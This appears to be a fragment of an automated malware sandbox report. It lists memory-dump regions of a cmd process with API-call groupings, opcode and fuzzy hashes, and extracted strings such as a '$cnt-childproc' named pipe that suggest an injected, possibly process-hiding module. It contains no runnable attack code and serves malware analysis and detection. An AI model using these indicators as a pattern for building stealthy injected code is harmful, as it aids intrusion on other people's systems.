                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction ID: daaeb4a7031d024ee919a440eda3750c61dd45222f3391b5a01005575d5b02da
                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction Fuzzy Hash: C9D16D33608781EAEB24AF7594403ED77E2FB457C8F940125EBAA57B95DB34C589CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction ID: a4c62bda3e9128b7e8f56f835762bc80b6ea39d921376139b8383329f43091ac
                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction Fuzzy Hash: 3ED16D32608742E6FB60DF7594413ED77A1FB957E8F900125EBAA57B96EB34C088CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction ID: 53e51993aeb7cd1e9d6dbc38ab9465e2a4542951f5d9dd34a00bdcd5e7a7f30f
                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction Fuzzy Hash: 37414F32218B85D6EB60CF71E4447AA77B2F388B98F848125DB9A47758DF3CC589CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction ID: 4c70f55e1ef05f4c03a3928169953ca9c1495ccbcec95566e5fc7600a5465d3f
                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction Fuzzy Hash: 0B415E33218B85D6E764CF31E4443AE77A2F788B98F848129DB9A07758EF39C549CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                          • String ID: \\.\pipe\$cnt-childproc
                          • API String ID: 166002920-175842701
                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction ID: 3ed497377569788ce0e07239fb4fd65972ff783c0209c07871c134d3bd714327
                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction Fuzzy Hash: FB113D31618B45D2FB108B31F5543A97762F389BD4FD40325EB6A02AA8CF3CC148CB80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                          • String ID: \\.\pipe\$cnt-childproc
                          • API String ID: 166002920-175842701
                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction ID: ef1304914087ab27613cefec701475e7a685d52c3e90f6566692f92bf592e213
                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction Fuzzy Hash: A2117F32618755D2EB10CB31F4543A97761FB89BD4F940320EB6A02AA8DF3CC549CF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: 3d4eae2c4b73e38361e66ec47bccb731964f3b6350fc7dcc08109cfba711b831
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: 0D81B03060C74FE6FE54AB76D4423F966B3AB85B84FE54035AB2B87396DB38C8458701
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: 0b05e2dc5e0d5619263ced3579970e4d68fedc4c9f392093c82c68063e5203eb
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: 0C818D72608283E6FA619B7598413FDA2D3AF857C4FD44035DB2B47396EB38C84D8E01
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: a48c0dbe5ec7c2d48a4e53f4845102c0e03c8a4f8b35e210cab47a38fb375f58
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: C0818331618243E6FA549B7598413F9A293EF86BE4FC84135DB2B47796FA28C94D8F00
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59B31
                          • GetLastError.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59B3F
                          • LoadLibraryExW.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59B69
                          • FreeLibrary.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59BD7
                          • GetProcAddress.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59BE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction ID: ad6fd5661dd55edd574d3f812baf7143029090712ad158e2e68d1b5aeda0287f
                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction Fuzzy Hash: 7231703121A64AE1FF119B2698407F523A6B756BA0FD94635EE3E47790EF38C444C350
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9B31
                          • GetLastError.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9B3F
                          • LoadLibraryExW.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9B69
                          • FreeLibrary.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9BD7
                          • GetProcAddress.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9BE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction ID: 79078bea5e0f67c0689990d580968cf3ca01bafa27522315f69c9d2effeb977c
                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction Fuzzy Hash: 5931813221A655E1EE529B2698007F923D6BF45BE0F9A0635EE3B47790EE38C4488B50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction ID: c8bc36c104579d613e2aaf92f0ea7fa88c7f3c3577bc06a9845517e650cd810a
                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction Fuzzy Hash: 44115132218B85D6EB508B66E854769A6A1F788BE4F844234EB6F87B94CF3CC4448780
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction ID: dfe7ded31a0d3f08adfb74ad49b68e5dae249f90a9718e3cf060ecd474b7eeed
                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction Fuzzy Hash: 6A119631318B51D2E7518B62E85477967A1FB89BE4F800234EB7F47794DF38C9188B40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction ID: 6cb94774491a802405ca0dd9f8034c39fc913ce7cb8353b5a87ebebe82d194bd
                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction Fuzzy Hash: 90D17E76208B8DD1EE70DB16E4943AA77B1F388B88F910126EB9E477A5DF38C551CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction ID: 6f7d5f8d6369c8f5eaa3fc9d5c2b0e3bfe3ec0142a18223c122c8e2b7fb4d2fe
                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction Fuzzy Hash: DFD19A76208B89D1DA709B1AE4943AEB7E1F788BC4F500126EB9E477A9DF38C545CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Free$CurrentThread
                          • String ID:
                          • API String ID: 564911740-0
                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction ID: a10cebae7078db975e1bb4634a224f6a4c10dec8b895325c3eaa7cf082e27757
                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction Fuzzy Hash: 58517E35209B8AE5FE0A9B74E8912E823B3BB44748FC44935A73E466A5EF78D558C340
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Free$CurrentThread
                          • String ID:
                          • API String ID: 564911740-0
                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction ID: 35a634e74db6d1d8984af8e098f3f676bafa3c4bb7eb449453718a10ebb7fb52
                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction Fuzzy Hash: 41518236209B47E6EA059B35E8902E823A2BF45794FC40935E73E067A9EF74C51DCB50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: $cnt-
                          • API String ID: 756756679-2536841369
                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction ID: be45dc0f8b6439d1562b9b663e16e9f3e51b669f78ed338fe42bb581fc2daceb
                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction Fuzzy Hash: AA319031709B5AE6FE18DF3695403B9A3A2BB44BC4F8840388F6A47B55EF38C4A18700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: $cnt-
                          • API String ID: 756756679-2536841369
                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction ID: bbb51da777e445ed30b8d1a99ab5f34cdef87c7243dca9eb9e0611012be9fa37
                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction Fuzzy Hash: B3316F32709B56E6EA19DF36A5406B967E2FF44BC8F884034DF6A07B55EF34C4698B00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction ID: 6162ae52a34040cd6196f11f9c16a42204eab65c4e24f8ebbb020631b6478a98
                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction Fuzzy Hash: FF11A33570C64BF2FE186B31A8113FE2263AB867A1FD44234AB37967CACE38C4418740
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
